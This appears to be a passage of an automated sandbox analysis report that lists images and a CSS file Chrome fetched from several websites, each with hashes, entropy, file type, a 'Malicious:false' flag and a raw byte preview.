                                              SHA1:17BEF6602672E2FD9956381E01356245144003E5
                                              SHA-256:55EAF62CB05DA20088DC12B39D7D254D046CB1FD61DDF3AE641F1439EFD0A5EE
                                              SHA-512:2A1D4EBC7FBA6951881FD1DDA745480B504E14E3ADAC3B27EC5CF4045DE14FF030D45DDA99DC056285C7980446BA0FC37F489B7534BE46107B21BD43CEE87BA0
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.gstatic.com/recaptcha/api2/info_2x.png
                                              Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..W..DA.=.6O...H.,E.............b.....C.1...1..EbLPI.W......H..s.z5.:..._.d.0.u.......j.x.R..._.v..R...1..ir..`.yn..R..j.h./y..l......(`..5....l.E..0......B^......F.....F....Y|p..._,p.............(3^.r.P.O......;<....z.,..yF....N..x.MS...Q.C%......D8G.+......oOk...)T..}|..e...G.....'.R..G.Z.T}7(...&..@...G....$PGYv...A.c.]d....N..'.4b...R.%..)2Yd..b.M..^@.M....^.:h.N(dP*t..RQ%.o...{.vGH..S._".@./...g.....]...?..h..E.,r.m.%."."W.6G..t...->....q\.Kc.t"^......Kj~{l..C..).y..><@|yB....=c.............!...<....IEND.B`.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):9168
                                              Entropy (8bit):7.359469681008362
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKw+7O0pk6XJNqmL5GYwjok9gkJ2ZYq:4YNg7efZXJzNGYwjL92ZYq
                                              MD5:859402CC9424834016B258E6DEC1CA01
                                              SHA1:06163F67CBC82D4775BDEEAF2A0EF160D498A1D9
                                              SHA-256:315B1EB4244FACE5374C28F8CBCE606AA0F0DCB42EB944A4F9C13D0633AD60D2
                                              SHA-512:68F8E04CE8A1349422A458055DFE678CF390AB0A5E64E9147F971330D3BB747EDEE77B492F1BA9C26F85B7C41031A7B3EE96E229672CB57C339B17D740D0AEF0
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text
                                              Category:downloaded
                                              Size (bytes):2040
                                              Entropy (8bit):4.981290276672384
                                              Encrypted:false
                                              SSDEEP:48:dqbZf/l7AtVCRlrfl5lrQM0flrQKWS0hIs5Q0HSidZrcrHoVtl/kv/+v/Xqlc1N9:SJh29HWThIq0cXl/w/G/UcJcFcZ
                                              MD5:A22314B393DBB618729BFFF166185D63
                                              SHA1:D768298879376A4F6E4A28BD5FEA2F9635009EA4
                                              SHA-256:9B6D3A82D3E6EE3214011AA3E2AF89C0D51F805CEA675E7A1E8CD3EAB811DC4D
                                              SHA-512:C5A0574B7A6DB1F018B726FD5D7FF5C17DCC142E2607505CE86D795E32F231FEEED247ED06929707E5CBFB2C54CFCFB203ACF00FCF3A80207A20A5D1D3248A6C
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/css/progressbar.css
                                              Preview:.sonny_progressbar {..margin-bottom: 16px;.}..sonny_progressbar p.title {..font-size: 18px;..line-height: 20px;..margin: 0;..padding: 10px 0;.}..sonny_progressbar .bar-container {..position: relative;..height: 40px;..border-radius: 25px;.}..sonny_progressbar .bar-container.shadow {..-moz-box-shadow: 0px 5px 7px -3px rgba(0,0,0,.5);..-webkit-box-shadow: 0px 5px 7px -3px rgba(0,0,0,.5);..box-shadow: 0px 5px 7px -3px rgba(0,0,0,.5);.}..sonny_progressbar .backgroundBar {..position: absolute;..bottom: 0;..top: 0;..left: 0;..right: 0;.}..sonny_progressbar .bar {..position: absolute;..top: 0;..left: 0;..height: 100%;..border-radius: 25px;.}..sonny_progressbar .targetBar {..position: absolute;..top: 0;..left: 0;..height: 100%;..-webkit-animation: Animation 2s infinite ease-in-out;..-moz-animation: Animation 2s infinite ease-in-out;..animation: Animation 2s infinite ease-in-out;.}..sonny_progressbar .targetBar.loader {..-webkit-animation: AnimationB 4s infinite ease-in-out;..-moz-animation: Ani
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):6256
                                              Entropy (8bit):7.947153038185955
                                              Encrypted:false
                                              SSDEEP:96:b0uF+76CPUZ7mc/Ng2OfRecbaFRYk+wid3yqcHCT1fAI/E2/6RyXlvIfqQnfV:ZF+GC8Z7m63Of1s+k+wueHWY0Ypt
                                              MD5:C254C5A418EB770352398FE696480DA3
                                              SHA1:2416E78012A1D5C3CE413290481D9E6ED0083F58
                                              SHA-256:AD88A46968B5662390C18BDFF7AC28634C9051DD5C019C96801BE56E20CBDAE0
                                              SHA-512:82FDE3AAD21B18DAE6D7281AE3905521AA98214B8625CAB5683645C3A99C4D81D6110CA0D2C734040C57EE3093B82F1A1952B45A334E89C71DFCAD6610B0D482
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE..............................kl...................................................ie..................bk...kb..............................pq......kl...................ik...................`OB.................................................pq......hc.......~..........`d..................%#................I8........|...us...T........H9...~.........CJ...........o..........}z.............48.kn........df........ge..........$"....uv...........................f.......g...><...Z^...........}............?H.WU.........ZX.......R.d........36....#.kqb;.(%.....yxP.....<..wv..~z.r...WH.-R.6....IDATh...WR...p.. .uc..f........q..0D.~.$.".Fl.Z.mFG;-5*OZ...Z6.4..F-=.jlV......jv~:.w..]..Y..........d2..`P(.[a.il$..P.../.+.........20.B."....G .8.O....".[a......fQ(...z..A...E.?....A..K.p7..OHIq..Bc&$..|..B.\....D&..V.MDZZL&....3.(..._....D."""...$.v%../.Vg.:k.%-.Ib..l..@.a..#.W..$..<
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):18062
                                              Entropy (8bit):7.76016532792245
                                              Encrypted:false
                                              SSDEEP:384:4YNg7fkna4imoOvIVRbLXnqQsg/BKJ9pWKGafLj9SFDDUWMnSbca:4Yy5OvwRHX6/YnmH9KVksT
                                              MD5:D33604A46A1546883155BA9D410D461F
                                              SHA1:897B89114622721AAC896E1AC411DEEC0F06FAB4
                                              SHA-256:BCD36C5F11CC4B23C0A8DD532AE57933FF24C7D082FD880803EC747AE94E874E
                                              SHA-512:2FBD4C2EE15FD437991AEEC09A5E0E806F23CB0FE3B2F5FFBCF6931E86B34D069DCDD427A5F390F3AEE69E51B5A5514646B54BB560ADC94150C688240443BDC1
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):12648
                                              Entropy (8bit):7.971740687456701
                                              Encrypted:false
                                              SSDEEP:384:K0wk3GJ5Un3ftABTMEZbP9jizbiubhTk+mb:KOHnVOB0eunc
                                              MD5:5579F112B3D3615DA9FF1F76A98EA0BB
                                              SHA1:C22971EC1E4E80E5B7A08EE4154CA8E23F3EB483
                                              SHA-256:8E7C502A60236B2C25CCC99D777B07AB46D7E7F40450464668FF1E1DD41C5E8D
                                              SHA-512:7C9B07DA7FC136261F6D319DBF3FD3EC9C3EA472949910F8FFED3A8048FC14EE0799749D6E867B65FE9F72DB574E8DDD81AC28E5D41EC4E7F8B085223DA864AD
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/14.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):15764
                                              Entropy (8bit):7.959141688135173
                                              Encrypted:false
                                              SSDEEP:384:K0wFwe8uKrCT2U3Qjbv3aYr65r5Kd3xBJWCFfpqLccRcBjN:Kce8ufgH3aJQ3WxLccRcv
                                              MD5:5EA3AB72AAAAFFC45F6C691E6868BA45
                                              SHA1:06A5BF4877F0D20427958603B0CFC24CD4639581
                                              SHA-256:ED140BFF11431081802465A422AB8BD90135C2A8B830EBC4F53A7F4EFF85BBB2
                                              SHA-512:F6470DB7AE4A4D95259937A96D198B31F97A364DDD6AACFB9B4DAC1E77360F136549EC2C1F167F434E8D1BC99986FFBD8A50C7DCFED5867F785C7E3460DC02ED
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/23.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 0x0, segment length 16, baseline, precision 8, 550x550, components 3
                                              Category:dropped
                                              Size (bytes):52874
                                              Entropy (8bit):7.956897604559998
                                              Encrypted:false
                                              SSDEEP:768:hITrQ4fdfKsZzfR8nFscyrahdLZh2I6brxkYPp0b5HhFMQGbzbdZc+ZxixW:ClfHV+njyrC9h2R9xp0xh6Rc+Z/
                                              MD5:AA5D4A7082D4612173F434AE453FAB60
                                              SHA1:2EDE60C19BACFEF3D1C6D0E9ADBF0C47BA0CE612
                                              SHA-256:00059EA6ABF0DB85605E3FA11CD274FA7F3A1A3F76758E47CAA3EB412E5228B8
                                              SHA-512:E3A6808E5A81C34885C97E6D52051DFA11BF5EAF4520E62AA064CACA27E4F185F65E9BF5B0D4652C613C408FA64297B5974C53828E38C9CE5AC7780CEAAEB0DA
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF.............C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......&.&..".........................................P..........................!1.."A.Qa#2Bq...3R.$b..4C....7Dr.....%STcs....5..t.................................9.....................!.1A..Qa.q....."....2.B..3R#b4r...............?..c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.1.`.c......1.2.].-....3....R....>..@pCifH.\..w...~....ug.P....U..l..qt#n..=3.....l(M.If.Uy..a.0..I.._N..#.'~..pg-.iv.5..w.#..N..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):18550
                                              Entropy (8bit):7.76599249774262
                                              Encrypted:false
                                              SSDEEP:384:4YNg7Dt+uTsATMpkbaQjqiXuvbW1MXeRfSIqXmYJoCJfG5h/i:4YydxTFT4kbawqi+vi19dEXBOqG5h/i
                                              MD5:6956DC565A202F842A2D5F6783347F7A
                                              SHA1:A780A1559786089CF99B965F552AF6A2DB716C88
                                              SHA-256:15B582E72EBDCAC6059A726488F2A91D18728150EC076F8739701B7C6A96D621
                                              SHA-512:03496CE044F0AEB962CDEA267FCCE71B26861BC36E213F17E693C35A88D79F824067F1C20C2FBE703647AF97E47AF7795BBE59ECF722D14BD9E3286697AE1979
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/8/4835a95b0d49f090f251d0c6a6c15dc2.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):6150
                                              Entropy (8bit):7.967626236152151
                                              Encrypted:false
                                              SSDEEP:96:Hx9ihsN+fpVjbkVJYKgTN5B+g/B9pVxvzxOOAgi3k7mGh+D7OWNAr3sfC+:RYIEnjbkVzq/B9trxOZ03h+D723gC+
                                              MD5:1A26ECFFFBFD99EE55010250E237BE04
                                              SHA1:DECCAE84FDEDA23A7CF2A255557C451C9A802614
                                              SHA-256:C759243814EE0916A46A381060B893057DC1B0C70787B6EE629AB6EF28E31BBC
                                              SHA-512:7EE26F576650C705F7370EE4D727C34A8C0197D664DFF92407750F8035DABB4EDA0BA88B491CDDBB0EB7F865C17F98CE6DF6B0F564173F848CA2205009A993D9
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.S..7.....7yf...3~.......8~....P.....M..O...v..............c.....i..d...............H.................W........6r..............c........?.......f.....y...............+j.........;..R........Q..................f.......`......Y...........G.....c...................[.!...........|.........z.t.....R.d........<..s...........D."O.....g....4a.Q....a..r..k..Lr....M}.o.........j.....Q...........o.+..'s. I.>..;.._..6..u..q.......IDATh...S....a..a.m@.d.MbX.e.E..Eq.q..w.[....Y/e.?....yu..i.X.a8......J.+c].VBG.0.f.Fk.KK...^G...`p.f.3.[#...\....DKX..j%d.?..<.O;......5........J...0.GB.,..l/...... .p|".p8@..=...9...W.. ..+....FC.......=....js.f.8u......e.............z.~.7.v.M<1....V..m..G..\_.oE|........=..O/..B<>..@.us"...._6sj5.jC...GA..)...5.). h..y@..J.OM...p......CK...,y.p..C..../.]......1.RA.8...c.pK.vl....+....0.Z.0...dR..V. .....A.......Y.=.-....z.....-...YM;..L.\..A.+...R...'..j.. ...i4..^].37....U8..q.z%..C.!v.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):3156
                                              Entropy (8bit):5.794499969863823
                                              Encrypted:false
                                              SSDEEP:48:LtTvnhhhhhFHPAj5hhhhhhhhhhkG65O/2HJuaE4UJbam/e7/NQyQ/y:lvHAuHs/2HdJ1mycy
                                              MD5:3174F005FACAD6FF9A2EC3F0FF0B3610
                                              SHA1:0C20BC5A9222BB649284E4F289AD1A354EC0AD6B
                                              SHA-256:052B1B94AE3B291555F2062D21618F31A74E3D751922533A5615807EED8EE88D
                                              SHA-512:91F63221DD969436B7EC2F8E18AD3FC18B96CD28F583160D02DD3885E80E4D4C846CFCC536B461739EAF5B2D3F4D8CFB8D0D0A9FA4F9CD0A173D2EFB5E6E7361
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR..............x......sBIT....|.d.....pHYs..........+......tEXtSoftware.www.inkscape.org..<.....IDATx...=.]i...g.EM..+.....&X..F..9N.?@..i2E.%_`0C..D..l.D.Jp.;m,.'"B.8./.-....._.Z........as...5..................................................................;..G.5...V?.(r..............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ .....T}..[..>=..W.|w....w......%....%............-..T..Z.. ....@........$.. ....@........$.. ....@........$.. ....@........$.. ....@........$.. ....@........$.. ....@........$.. ....;..G.5...V?.(b...@........$.. ....@........$.. ....@........$.. ....@........$.. ....@........$.. ....@........$.. ....@........$.. ....@...oo}i[.m..G.V?..}.w5..-...H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ ............H..@ .....w.n..............W.....W..|..)....0....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3895
                                              Entropy (8bit):7.944583262003043
                                              Encrypted:false
                                              SSDEEP:96:3RCov7Kkm3yaMKuQ1cvvZayGg7li1cB3YWrmN65d:3RCov7Kkm3MKu7XUVKli1gYWw6L
                                              MD5:ABB1F2219CACC62144DB85E591B4C6C1
                                              SHA1:548E027F3BA48F5A954BB35313D77922B3C14F10
                                              SHA-256:89E6BA9788A7A8ECB018C537B5BF0A5670A8542F6B2535D33B88F8FF440035EF
                                              SHA-512:A25387A02412D94C2A5D4A51305EE1681E8BAD5A678C22004E98C3C81DC726816E3D9EAC9C37DF42E0607035A2285F1CB64DF6120D7A74C2FDFC66983ED07950
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.................................................}........|...................{.o................V..&..g.......1..........?..F...........On....eIDATh........CB.%!$. .APTD}..;...3{O9.gzU[..5.YY..I.wcYD).%..[.E....$.V.,N..7.........F.c./Z....4.{0......TI.SX....u.Ek.q\..<u....H....$f.V4...at&.7.K. .x.< !........m.$.~9...Pv9..Z.A......;.T..p.aoi.=!.gHbYDW.aT*'A.....,"?i..P.^.n7...d-|.G./'9fv.N......?ki..}.4Jq..z.....+.....LSA.R2x..|...#'..u.g.z..,..!........'.&k......'.C&..K8.. .=\.y...'..v...9'.wA.p.....$.P@...K}\}.D(.kk.O..J..[.K../\..,.o..tf>.q'.e..p... !QR..{...F...!.}|.I.S.E[..-....Rx_!.......*..A6..7.O.rd:...<.s%=.o...\.^.....p...1Jx..~e..T.. ..O..T.(.\....n.,!............G%....|k..&.....R..;...1...'.zH6.........0.....}...Q.a.......a..p........G....H*...+Z.....X....d...">B..8v.....,.2..=..#....................||_.......}99.V.l.$F..?..;. 9.M.|....tyJ.$.F..+...L}..J3X.y.W.d.a....&._.x.].*.q..a.<..-.}..2S.....:-.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):15166
                                              Entropy (8bit):7.983733019454587
                                              Encrypted:false
                                              SSDEEP:384:pG7oSTin70qbIABXQ/ut2Xfxb66G/y7FG9j2V6bIe3:pOoSTk0qfOutWb66G/vjP0e3
                                              MD5:6002350AEA931E5A5F45840369E2447F
                                              SHA1:FC0A6D76D23DDABE74BC9045B79BC02BA0E969B8
                                              SHA-256:87D3BE651CE813793799CB927016AD957A0AAF1665ED1C331ED2A8AAD4DA5BA7
                                              SHA-512:DBAC5F9E154146B091A87A011793A9245F1820130BD6F9A1CA4A88EA2585F9CF539803260750CB5800CB6962285A3CFBB69FCE8DEE04DA3C52FB000079B51652
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF6;..WEBPVP8L);../..?...mU9...$...hE.J...e...k.6.{nl.7]......m.WO.m......COI...3.........$".H.4..pC....@F.@.x@.L..dD\VpV..._v.A..B...@.H@d.......U.]N.$G..+....x...?#?,..e...y.r.C..-.*....i........s.\.ul..W..B..u.X......b...&_i.4.U...t.......b....~..^[Jd...IvP.M..:.h...v...+:.P..x.<.o.._.... %{M..W.+....n..eg.;..*.|...i.k.I ....X..b...^c.fz.g..8...d..v...,M....tt.;.>....K.$.n..aI....yw.........u}../..E.._a....>{R..}.G..O..lM......> ...l.._ra..VJ..._.....HU..-...N.O.{.7_.b.._..9..(.|A....oX_njoU../W............_.9..|./_^.9f!.pm.y.o.X.'W..."^<)..[..`.6[..p.,.....aP+q.-.w.P.......*5.4..{.?.......?.v.4.ln.I.V........W.x.<#....}..e.O....@......K...(.............7..R..F.zOfV.%./...e.f{A./..?..x.........[e....w._]...W....su...G....b....."+.g...'L+5.0.C.-......o.....MF.nxxJ........>.j......_..(....ah..3......}.G.>...S....KLSh.s.0....f...z.......L.I...X..U.r.7n...N ..O..y..p^r[l.J.S.)...t^z....y..C+E.2|:.!..sp..D.}~...R.~.,..<P..^.3....\.....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):4402
                                              Entropy (8bit):7.943484504188233
                                              Encrypted:false
                                              SSDEEP:96:Tck4SD9wuFPruZn8a2sWlSs/Oyt7X1sqkv4hU/qI:TchuFTXlx/O01sqkv4az
                                              MD5:2A94457FD69AE6EF245FB66F6AEC07E4
                                              SHA1:C1A4883F0E54731525EADC94F109894563CB4DA8
                                              SHA-256:F9915C7C3A9731A9C0163E3C159846AB689814B14433C92B3F18FA82876BDE99
                                              SHA-512:5943C0A2A77D46EB136A6E0E4B7DB204D478BE7EBEE30BEE93944BE016D5C24DC9C76D10031FE378586AB1A03A8EF929361ECE17A8D4EE2A5F838CA7619F3FDE
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE.........................WL......[....................BK{.UDz..FDu.......\^..QL..N......NV.KO.KPuDIl......[...........e............WM.U;U_....AX.UD...9.Wh.......ZRQ.....>Ad.........Zg......Tz....BF..VX.U..x>....JB...[..VZx...eh......to]kT.j...q|.TNd......XmjOk..mp....uy....^^..^W....[AJl..d]f.......^j...........^L.^E........A..}Yd..~N.Ti..K...b}.../.....J.....H..e........Qez...gIDATh...o.....;....8V..J..1...*#.^.........q..(H4H...W.~fm..9.=?...3;;3..3.D....A..,2...@.%..8..........l.1<.B.8.aY...XV...l.... ..w... pX1.\..W ...........G.H.(..=!..M.....Q..t<...O..x...P.+...Jz.V..6,.\.....0;.Q..{.D.uy'.4#.0.?.i.*..61l.C.W..v*.|.....R?o.....*W..a.C.. .vSB..L....j!....+....@.J..t.e.C..A.#I.?Q.e.^...pd....BDby...E1..........YE.. Xq.$...Q.....<..!.....0:...e.....Ax.E......T..B.^.0.[....A'[T......k.)......q...T..Bj..D.'..jQ/..u.,.;..")...S.q..x....k. .7.....Frl.2.?.`T..c......as?...x4.......'.4.4.?..`"..iP=...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):10391
                                              Entropy (8bit):7.423996702010412
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwpKRWANKzn2QRbqAUo7IOOvU/a5Lq1cI:4YNg7pKQANKzn2fbo7875e1cI
                                              MD5:78CD32FF42D447D0715DF95E70FCA8D4
                                              SHA1:641DD3EEDCE8505F026E59B00AF0577537498BC3
                                              SHA-256:0037C60C906F72BE914CA4EA16FDFBFDE0A08754CA24BC65208CD0D08A6B14FD
                                              SHA-512:909FA74AA2D5D397B1EFA1BFBAC6A16B9AADA2BC6E79F63591AAF2352AB26954355B3763A016FA33E5FD805037E68E611273C6DB03CC3D01AA2D0B10F37A5FAC
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/55/7f6f23c34379047a7cd871c24cb7cc57.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):16471
                                              Entropy (8bit):7.730604293307563
                                              Encrypted:false
                                              SSDEEP:384:4YNg7CJJdnH43E3ufWwVvWyD5JA4k8grA:4YygVHEEzwQyDY/8grA
                                              MD5:38CA778B8D34646B2CA63C338A81DD5C
                                              SHA1:69AF59D8D622BE13CC6127E274A9BECF12A5E71A
                                              SHA-256:A36F1FD0D0B01B05ACED180BFB01E26222E2AE3EB6B5A409D82E9937D63B469E
                                              SHA-512:6FB078A99E1AF67576DA7DA4ED49A10D6AEC802E0CBA453BC45F4FE54E7556150768191ADF786775800541C887D0F47AEF2F6E8E5ECAD5FC58055B50DB6C31C4
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/66/eefb5e22eb5e4f888b56dd2b1db37be8.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
